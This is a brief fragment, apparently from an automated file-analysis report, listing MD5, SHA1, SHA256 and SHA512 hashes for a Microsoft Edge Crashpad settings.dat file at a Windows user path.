SHA256 4f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c
SHA512 f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b274323e60ab420b536dbd574e86dcee
SHA1 2a10b1f2ccce3d2cedc4df01fee7736e88dc1b31
SHA256 a5b6c0c3322fe9e3a01b15762ed86a31a97dade09e4c6b71d0b110d114784d81
SHA512 2bc7063547bf2a7381bdd98edf1eaf9b92a772770e5e876a22629380bf5fe10e9291287e14020d388ab5e6e2bd7cb10aebf0883c2abd576456dab44255d0cf43